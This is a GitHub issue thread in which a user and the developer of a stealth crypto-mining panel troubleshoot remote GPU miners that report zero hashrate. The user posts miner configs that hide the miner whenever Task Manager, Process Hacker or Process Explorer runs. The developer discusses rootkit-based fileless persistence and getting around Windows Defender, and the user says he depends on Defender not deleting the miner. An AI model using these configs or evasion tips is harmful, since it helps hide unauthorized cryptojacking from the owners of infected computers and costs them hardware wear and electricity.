### ISSUE TITLE
ETC Miners doing 0 H/S with good GPUs

### ISSUE THREAD

**Issue by arblad1990** [UnamSanctam/UnamWebPanel#138]
![image](https://user-images.githubusercontent.com/78943172/170578881-5a530ccd-bbd2-41b3-8deb-86da1077b204.png)

All my etc miners are showing as "Active", and even "Active (Idle)", I'm not sure why as some of them have good GPUs:

![image](https://user-images.githubusercontent.com/78943172/170579107-0d470567-d8ec-4fa3-8c6f-fc2613b834a6.png)

I was originally using nanopool etc with these settings: (replace x with my address):

{
    "url": "stratum://`x.Worker`@etc-eu2.nanopool.org:19999",
    "algo": "etchash",
    "max-gpu": 50,
    "idle-wait": 1,
    "idle-gpu": 100,
    "stealth": true,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe"
}

Then I updated the miners to 2miners to see if the pool was the issue (only 2 of the 6 even updated, the rest stayed on nanopool for some reason: (x replaced with my address):

{
    "url": "stratums://x@etc.2miners.com:11010",
    "algo": "etchash",
    "max-gpu": 50,
    "idle-wait": 1,
    "idle-gpu": 100,
    "stealth": true,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe"
}

any ideas on what the issue is or how I can fix this? 1 of them was mining etc earlier today as well, so its very strange that now the miner is active and (idle) but still has 0 hashes.

**Comment by UnamSanctam** [comment]
Someone has reported that the "Stealth" status might be bugged (not being reported, the active status might be overwriting it), so try changing them to:
```
{
"url": "stratums://x@etc.2miners.com:11010",
"algo": "etchash",
"max-gpu": 50,
"idle-wait": 1,
"idle-gpu": 100,
"stealth-targets": ""
}
```
and see what happens. Also could be that they're out of VRAM but the integrated CPU might be reporting that it has enough VRAM (but it won't mine on it).

**Comment by arblad1990** [comment]
Thanks that seems to be working for one of them now so they have a hashrate and are now mining ETC.

There's another one which has had a constant hashrate of 0 H/S and I've never seen them go above 0 despite having a very good GPU: (Geforce RTX 2060)

![image](https://user-images.githubusercontent.com/78943172/170733169-b85dc30d-17ae-4151-ae7d-35664f130686.png)

Do you think it could be an issue with the ports maybe? All of them seem to mine XMR with no problems though, are there any GPU pools that use other ports which aren't usually blocked (I know you mentioned moneroocean on another post, but I was thinking more for GPU if that's possible).

**Comment by arblad1990** [comment]
Also about 30 mins ago I updated all of the configs to mine ETH instead to see if that would make a difference, but only 3 have actually updated (which weren't even mining anyway!):
![image](https://user-images.githubusercontent.com/78943172/170733862-5e151445-1579-421e-bf39-f0f7f514b8ad.png)

It doesn't seem like the one mining is changing to ETH despite the most recent connection being less than 1 minute ago.

**Comment by UnamSanctam** [comment]
Sometimes it will not change immediately if it's busy so that's normal, it shouldn't really have anything to do with connections, how many of those with 0 H/s have integrated GPUs (like the Intel one in your screenshot)?

**Comment by arblad1990** [comment]
It seems like all of them (apart from 1) have integrated GPUs alongside, here's the rest of the GPUs which show as Active from the list above (the only one that I've seen mining is the 1660 Ti:
![image](https://user-images.githubusercontent.com/78943172/170769263-7097babc-96b4-48c6-b914-2092d8938c11.png)

![image](https://user-images.githubusercontent.com/78943172/170769400-a080edbf-0504-4866-92c3-fa91defeb26b.png)

![image](https://user-images.githubusercontent.com/78943172/170769488-61c156a7-82b8-44a9-825f-750b1805050b.png)

![image](https://user-images.githubusercontent.com/78943172/170769521-a704d76f-d7c8-4083-a54b-5a1bb1ef889a.png)

and also this one which never has enough vRAM free but most likely because its only 2GB:

![image](https://user-images.githubusercontent.com/78943172/170769740-c07d607c-dd92-4b1f-846f-db0efa7f11ee.png)

**Comment by UnamSanctam** [comment]
Alright, most of those screenshotted most likely doesn't have enough free VRAM which would explain it, could be that the integrated GPU (which has enough VRAM but won't mine) causes it to not trigger the "Not enough free VRAM" status. It should be different in the next update where status flow has been reworked.

**Comment by arblad1990** [comment]
Looking forward to the update, thanks mate! :) Also on a side note, for the crypto miner, would you recommend using the Rootkit currently? I'm sure I read somewhere on here that WD was detecting its usage regardless of exclusions or was that just an old version and there's now a newer version of the rootkit? 

Also is there any possibility for mining ergo or any other high value GPU coins which require lower dag size than ETC?

Thanks for your hard work as always mate!

**Comment by arblad1990** [comment]
or would UBIQ be another possibility for lower end GPUs? I saw it had a low dag size on here: https://minerstat.com/dag-size-calculator and has many pools available to mine at: https://miningpoolstats.stream/ubiq

**Comment by UnamSanctam** [comment]
The rootkit is quite a complex program so it might not work on all computers, I am updating the rootkit in the next version so it'll hopefully work on more systems. And yes the rootkit (r77-rootkit) uses fileless persistence to install itself but you can't exclude that in Windows Defender so I'll have to find some way around that.

I want to add new algorithms but it's a lot of work to do (and that's an understatement), then there's also the issues that there would most likely be many GPUs there could be problems with mining on since I only have my own GPU to test on so the rest I'd be doing blind and would have to wait until people report issues. Autolykos (Ergo) is probably the biggest candidate since Ubiqhash only works for Ubiq which is a very small coin which isn't very profitable at the moment.

**Comment by arblad1990** [comment]
Ok so it sounds like for now It'll be best for me to stick to using builds without the rootkit as I'm relying on windows defender not deleting the miner.

That's completely understandable about the algorithms, I had no idea how difficult they would be to add! ETH and ETC are 2 of the most profitable anyway so may not be worth the work of adding new algorithms if its a lot of work, the other coins like UBIQ might suddenly drop and be worthless as well at any time (like with raptoreum).

Would I be able to replace the ETC miner with the CryptoNight-GPU miner? For example on a computer which isn't working with the ETC miner but is working great for the XMR miner and mining to nanopool, would I be able to replace the ETC miner with the cryptonight to use GPU? Or would it have to replace the XMR nanopool miner? (sorry if thats a stupid question, just trying to get my head around it haha).
Thanks mate!

**Comment by UnamSanctam** [comment]
It would have to replace the XMR nanopool miner, but the miner would also have to have been compiled with "GPU Mining" enabled since otherwise the CUDA (Nvidia GPU) libraries aren't included due to them being quite large in size (30MB extra, which is why they're not included if "GPU Mining" is disabled).

**Comment by UnamSanctam** [comment]
I have released the new update now, I also decided to add the Ubqhash algorithm as well since it turns out they barely changed anything from the Ethash algorithm (that it's based on) so I could add it quite easily compared to something completely different like Autolykos (Ergo).

**Comment by arblad1990** [comment]
Fantastic mate, sounds good i'll check it out
